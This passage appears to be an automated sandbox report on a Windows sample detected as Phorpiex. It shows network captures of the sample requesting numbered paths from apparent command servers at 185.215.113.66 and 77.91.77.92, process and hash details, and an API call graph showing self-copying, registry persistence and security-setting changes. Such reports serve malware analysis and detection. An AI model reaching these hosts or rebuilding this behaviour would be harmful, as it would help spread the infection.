                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            60192.168.2.449832185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:12:58.903496981 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:12:59.606447935 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:59 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            61192.168.2.449834185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:13:01.637963057 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:13:02.354104042 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:13:02 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            62192.168.2.449836185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:13:04.385543108 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:13:05.072268963 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:13:04 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            63192.168.2.44983777.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:13:08.134874105 CEST163OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            64192.168.2.44983977.91.77.92806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:13:12.011240005 CEST163OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:17:09:07
                                            Start date:17/09/2024
                                            Path:C:\Users\user\Desktop\file.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                            Imagebase:0x400000
                                            File size:90'112 bytes
                                            MD5 hash:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:17:09:09
                                            Start date:17/09/2024
                                            Path:C:\Windows\sysmablsvr.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\sysmablsvr.exe
                                            Imagebase:0x400000
                                            File size:90'112 bytes
                                            MD5 hash:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysmablsvr.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 84%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:2
                                            Start time:17:09:19
                                            Start date:17/09/2024
                                            Path:C:\Windows\sysmablsvr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\sysmablsvr.exe"
                                            Imagebase:0x400000
                                            File size:90'112 bytes
                                            MD5 hash:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:17:10:03
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\158752420.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\158752420.exe
                                            Imagebase:0x6e0000
                                            File size:12'288 bytes
                                            MD5 hash:8242045FF6B7BED00C8A94C77193F2DE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:17:10:12
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\524024912.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\524024912.exe
                                            Imagebase:0x220000
                                            File size:7'680 bytes
                                            MD5 hash:AC0A159A6C219E2CEA55DCC77AB6E337
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:17:11:19
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\259428477.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\259428477.exe
                                            Imagebase:0xa30000
                                            File size:12'288 bytes
                                            MD5 hash:8242045FF6B7BED00C8A94C77193F2DE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:17:12:30
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\2958729589.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\2958729589.exe
                                            Imagebase:0x3d0000
                                            File size:12'288 bytes
                                            MD5 hash:8242045FF6B7BED00C8A94C77193F2DE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:0.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:17.1%
                                              Total number of Nodes:1477
                                              Total number of Limit Nodes:8
                                              execution_graph 4380 407500 Sleep CreateMutexA GetLastError 4381 407536 ExitProcess 4380->4381 4382 40753e 6 API calls 4380->4382 4383 4075e3 4382->4383 4384 4078a9 Sleep RegOpenKeyExW 4382->4384 4466 40ecc0 GetLocaleInfoA strcmp 4383->4466 4386 407902 RegOpenKeyExW 4384->4386 4387 4078d6 RegSetValueExA RegCloseKey 4384->4387 4389 407950 RegOpenKeyExW 4386->4389 4390 407924 RegSetValueExA RegCloseKey 4386->4390 4387->4386 4393 407972 RegSetValueExA RegCloseKey 4389->4393 4394 40799e RegOpenKeyExW 4389->4394 4390->4389 4391 4075f0 ExitProcess 4392 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4395 40764c SetFileAttributesW RegOpenKeyExW 4392->4395 4396 4076de Sleep wsprintfW CopyFileW 4392->4396 4393->4394 4397 4079c0 RegSetValueExA RegCloseKey 4394->4397 4398 4079ec RegOpenKeyExW 4394->4398 4395->4396 4401 40767d wcslen RegSetValueExW 4395->4401 4402 407726 SetFileAttributesW RegOpenKeyExW 4396->4402 4403 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4396->4403 4397->4398 4399 407a0e RegSetValueExA RegCloseKey 4398->4399 4400 407a3f RegOpenKeyExW 4398->4400 4404 407ae4 RegOpenKeyExW 4399->4404 4406 407a61 RegCreateKeyExW RegCloseKey 4400->4406 4407 407a96 RegOpenKeyExW 4400->4407 4401->4396 4408 4076b2 RegCloseKey 4401->4408 4402->4403 4409 407757 wcslen RegSetValueExW 4402->4409 4403->4384 4405 407817 SetFileAttributesW RegOpenKeyExW 4403->4405 4412 407b06 RegSetValueExA RegCloseKey 4404->4412 4413 407b37 RegOpenKeyExW 4404->4413 4405->4384 4410 407848 wcslen RegSetValueExW 4405->4410 4406->4407 4407->4404 4411 407ab8 RegSetValueExA RegCloseKey 4407->4411 4468 40ef10 memset memset CreateProcessW 4408->4468 4409->4403 4415 40778c RegCloseKey 4409->4415 4410->4384 4416 40787d RegCloseKey 4410->4416 4411->4404 4417 407c33 RegOpenKeyExW 4412->4417 4419 407b59 RegCreateKeyExW RegCloseKey 4413->4419 4420 407b8e RegOpenKeyExW 4413->4420 4421 40ef10 6 API calls 4415->4421 4422 40ef10 6 API calls 4416->4422 4426 407c81 RegOpenKeyExW 4417->4426 4427 407c55 RegSetValueExA RegCloseKey 4417->4427 4419->4420 4424 407bb0 RegCreateKeyExW RegCloseKey 4420->4424 4425 407be5 RegOpenKeyExW 4420->4425 4428 4077a5 4421->4428 4432 407896 4422->4432 4423 4076d6 ExitProcess 4424->4425 4425->4417 4433 407c07 RegSetValueExA RegCloseKey 4425->4433 4430 407ca3 RegSetValueExA RegCloseKey 4426->4430 4431 407ccf RegOpenKeyExA 4426->4431 4427->4426 4428->4403 4429 4077b0 ExitProcess 4428->4429 4430->4431 4434 407cf5 8 API calls 4431->4434 4435 407ddb RegOpenKeyExA 4431->4435 4432->4384 4436 4078a1 ExitProcess 4432->4436 4433->4417 4434->4435 4437 407e01 8 API calls 4435->4437 4438 407ee7 Sleep 4435->4438 4437->4438 4474 40cd60 4438->4474 4441 407f02 9 API calls 4477 405b60 InitializeCriticalSection CreateFileW 4441->4477 5302 4073b0 4441->5302 5309 405820 4441->5309 5318 406b50 Sleep GetModuleFileNameW 4441->5318 4443 40806e 4448 407fb7 CreateEventA 4509 40c490 4448->4509 4457 40d6f0 17 API calls 4458 408017 4457->4458 4459 40d6f0 17 API calls 4458->4459 4460 408033 4459->4460 4461 40d6f0 17 API calls 4460->4461 4462 40804f 4461->4462 4554 40d860 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4462->4554 4464 40805f 4563 40d9a0 4464->4563 4467 4075e8 4466->4467 4467->4391 4467->4392 4469 40ef81 ShellExecuteW 4468->4469 4470 40ef72 Sleep 4468->4470 4472 40efb6 4469->4472 4473 40efa7 Sleep 4469->4473 4471 4076cb 4470->4471 4471->4396 4471->4423 4472->4471 4473->4471 4572 40cd30 4474->4572 4478 405c85 4477->4478 4479 405b98 CreateFileMappingW 4477->4479 4491 40dbd0 CoInitializeEx 4478->4491 4480 405bb9 MapViewOfFile 4479->4480 4481 405c7b CloseHandle 4479->4481 4482 405c71 CloseHandle 4480->4482 4483 405bd8 GetFileSize 4480->4483 4481->4478 4482->4481 4487 405bed 4483->4487 4484 405c67 UnmapViewOfFile 4484->4482 4486 405bfc 4486->4484 4487->4484 4487->4486 4488 405c2c 4487->4488 4701 40cdb0 4487->4701 4708 405c90 4487->4708 4489 40a740 _invalid_parameter 3 API calls 4488->4489 4489->4486 5016 40dca0 socket 4491->5016 4493 40dbf0 4494 407fb2 4493->4494 4497 40dc3a 4493->4497 4503 40dc78 4493->4503 5026 40df10 4493->5026 4504 406f70 CoInitializeEx SysAllocString 4494->4504 5041 40b010 htons 4497->5041 4502 40ea00 24 API calls 4502->4503 5060 40a860 4503->5060 4505 406f92 4504->4505 4506 406fa8 CoUninitialize 4504->4506 5205 406fc0 4505->5205 4506->4448 5214 40c450 4509->5214 4512 40c450 3 API calls 4513 40c4ae 4512->4513 4514 40c450 3 API calls 4513->4514 4515 40c4be 4514->4515 4516 40c450 3 API calls 4515->4516 4517 407fcf 4516->4517 4518 40d6c0 4517->4518 4519 40a320 7 API calls 4518->4519 4520 40d6cb 4519->4520 4521 407fd9 4520->4521 4522 40d6d7 InitializeCriticalSection 4520->4522 4523 40b850 InitializeCriticalSection 4521->4523 4522->4521 4536 40b86a 4523->4536 4524 40b899 CreateFileW 4526 40b8c0 CreateFileMappingW 4524->4526 4527 40b982 4524->4527 4529 40b8e1 MapViewOfFile 4526->4529 4530 40b978 CloseHandle 4526->4530 5270 40b0f0 EnterCriticalSection 4527->5270 4533 40b8fc GetFileSize 4529->4533 4534 40b96e CloseHandle 4529->4534 4530->4527 4532 40b987 4535 40d6f0 17 API calls 4532->4535 4540 40b91b 4533->4540 4534->4530 4537 407fe3 4535->4537 4536->4524 5221 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 4536->5221 5222 40b430 4536->5222 4542 40d6f0 4537->4542 4538 40b964 UnmapViewOfFile 4538->4534 4540->4538 4541 40b430 32 API calls 4540->4541 5269 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 4540->5269 4541->4540 4543 40d707 EnterCriticalSection 4542->4543 4544 407ffc 4542->4544 5297 40d7e0 4543->5297 4544->4457 4547 40d7cb LeaveCriticalSection 4547->4544 4548 40a570 9 API calls 4549 40d749 4548->4549 4549->4547 4550 40d75b CreateThread 4549->4550 4550->4547 4551 40d77e 4550->4551 4552 40d7a2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4551->4552 4553 40d7c4 4551->4553 4552->4553 4553->4547 4555 40d896 InterlockedExchangeAdd 4554->4555 4556 40d979 GetCurrentThread SetThreadPriority 4554->4556 4555->4556 4562 40d8b0 4555->4562 4556->4464 4557 40d8c9 EnterCriticalSection 4557->4562 4558 40d937 LeaveCriticalSection 4560 40d94e 4558->4560 4558->4562 4559 40d913 WaitForSingleObject 4559->4562 4560->4556 4561 40d96c Sleep 4561->4562 4562->4556 4562->4557 4562->4558 4562->4559 4562->4560 4562->4561 4564 40da22 4563->4564 4565 40d9ac EnterCriticalSection 4563->4565 4564->4443 4566 40d9c8 4565->4566 4567 40d9f0 LeaveCriticalSection DeleteCriticalSection 4566->4567 4568 40d9db CloseHandle 4566->4568 4569 40a740 _invalid_parameter 3 API calls 4567->4569 4568->4566 4570 40da16 4569->4570 4571 40a740 _invalid_parameter 3 API calls 4570->4571 4571->4564 4575 40c980 4572->4575 4576 40c9b3 4575->4576 4577 40c99e 4575->4577 4579 407ef7 4576->4579 4607 40cb60 4576->4607 4581 40c9e0 4577->4581 4579->4441 4579->4443 4582 40ca09 4581->4582 4584 40ca92 4581->4584 4583 40ca8a 4582->4583 4641 40a320 4582->4641 4583->4579 4584->4583 4586 40a320 7 API calls 4584->4586 4588 40cab8 4586->4588 4588->4583 4590 402420 7 API calls 4588->4590 4592 40cae5 4590->4592 4594 4024e0 10 API calls 4592->4594 4596 40caff 4594->4596 4595 40ca5f 4597 402420 7 API calls 4595->4597 4598 402420 7 API calls 4596->4598 4599 40ca70 4597->4599 4600 40cb10 4598->4600 4601 4024e0 10 API calls 4599->4601 4602 4024e0 10 API calls 4600->4602 4601->4583 4603 40cb2a 4602->4603 4604 402420 7 API calls 4603->4604 4605 40cb3b 4604->4605 4606 4024e0 10 API calls 4605->4606 4606->4583 4608 40cb89 4607->4608 4609 40cc3a 4607->4609 4610 40a320 7 API calls 4608->4610 4640 40cc32 4608->4640 4611 40a320 7 API calls 4609->4611 4609->4640 4612 40cb9f 4610->4612 4614 40cc5e 4611->4614 4613 402420 7 API calls 4612->4613 4612->4640 4615 40cbc3 4613->4615 4616 402420 7 API calls 4614->4616 4614->4640 4617 40a320 7 API calls 4615->4617 4618 40cc82 4616->4618 4619 40cbd2 4617->4619 4620 40a320 7 API calls 4618->4620 4621 4024e0 10 API calls 4619->4621 4622 40cc91 4620->4622 4623 40cbfb 4621->4623 4624 4024e0 10 API calls 4622->4624 4625 40a740 _invalid_parameter 3 API calls 4623->4625 4626 40ccba 4624->4626 4627 40cc07 4625->4627 4628 40a740 _invalid_parameter 3 API calls 4626->4628 4629 402420 7 API calls 4627->4629 4630 40ccc6 4628->4630 4631 40cc18 4629->4631 4632 402420 7 API calls 4630->4632 4633 4024e0 10 API calls 4631->4633 4634 40ccd7 4632->4634 4633->4640 4635 4024e0 10 API calls 4634->4635 4636 40ccf1 4635->4636 4637 402420 7 API calls 4636->4637 4638 40cd02 4637->4638 4639 4024e0 10 API calls 4638->4639 4639->4640 4640->4579 4652 40a340 4641->4652 4644 402420 4673 40a530 4644->4673 4649 4024e0 4680 402540 4649->4680 4651 4024ff __aligned_recalloc_base 4651->4595 4661 40a3e0 GetCurrentProcessId 4652->4661 4654 40a34b 4657 40a357 __aligned_recalloc_base 4654->4657 4662 40a400 4654->4662 4656 40a32e 4656->4583 4656->4644 4657->4656 4658 40a372 HeapAlloc 4657->4658 4658->4656 4659 40a399 __aligned_recalloc_base 4658->4659 4659->4656 4660 40a3b4 memset 4659->4660 4660->4656 4661->4654 4670 40a3e0 GetCurrentProcessId 4662->4670 4664 40a409 4665 40a426 HeapCreate 4664->4665 4671 40a470 GetProcessHeaps 4664->4671 4667 40a440 HeapSetInformation GetCurrentProcessId 4665->4667 4668 40a467 4665->4668 4667->4668 4668->4657 4670->4664 4672 40a41c 4671->4672 4672->4665 4672->4668 4674 40a340 __aligned_recalloc_base 7 API calls 4673->4674 4675 40242b 4674->4675 4676 402820 4675->4676 4677 40282a 4676->4677 4678 40a530 __aligned_recalloc_base 7 API calls 4677->4678 4679 402438 4678->4679 4679->4649 4681 40258e 4680->4681 4682 402551 4680->4682 4681->4682 4683 40a530 __aligned_recalloc_base 7 API calls 4681->4683 4682->4651 4686 4025b2 _invalid_parameter 4683->4686 4684 4025e2 memcpy 4685 402606 _invalid_parameter 4684->4685 4687 40a740 _invalid_parameter 3 API calls 4685->4687 4686->4684 4690 40a740 4686->4690 4687->4682 4697 40a3e0 GetCurrentProcessId 4690->4697 4692 40a74b 4693 4025df 4692->4693 4698 40a680 4692->4698 4693->4684 4696 40a767 HeapFree 4696->4693 4697->4692 4699 40a6b0 HeapValidate 4698->4699 4700 40a6d0 4698->4700 4699->4700 4700->4693 4700->4696 4718 40a7b0 4701->4718 4704 40cdf1 4704->4487 4707 40a740 _invalid_parameter 3 API calls 4707->4704 4931 40a570 4708->4931 4711 405cca memcpy 4713 40a7b0 8 API calls 4711->4713 4712 405d88 4712->4487 4714 405d01 4713->4714 4941 40c720 4714->4941 4719 40a7dd 4718->4719 4720 40a530 __aligned_recalloc_base 7 API calls 4719->4720 4721 40a7f2 4719->4721 4722 40a7f4 memcpy 4719->4722 4720->4719 4721->4704 4723 40c2c0 4721->4723 4722->4719 4727 40c2ca 4723->4727 4725 40c2e9 4725->4704 4725->4707 4727->4725 4728 40c301 memcmp 4727->4728 4729 40c328 4727->4729 4731 40a740 _invalid_parameter 3 API calls 4727->4731 4732 40c7b0 4727->4732 4746 408080 4727->4746 4728->4727 4730 40a740 _invalid_parameter 3 API calls 4729->4730 4730->4725 4731->4727 4733 40c7bf __aligned_recalloc_base 4732->4733 4734 40a530 __aligned_recalloc_base 7 API calls 4733->4734 4745 40c7c9 4733->4745 4735 40c858 4734->4735 4736 402420 7 API calls 4735->4736 4735->4745 4737 40c86d 4736->4737 4738 402420 7 API calls 4737->4738 4739 40c875 4738->4739 4741 40c8cd __aligned_recalloc_base 4739->4741 4749 40c920 4739->4749 4754 402470 4741->4754 4744 402470 3 API calls 4744->4745 4745->4727 4862 40a2a0 4746->4862 4750 4024e0 10 API calls 4749->4750 4751 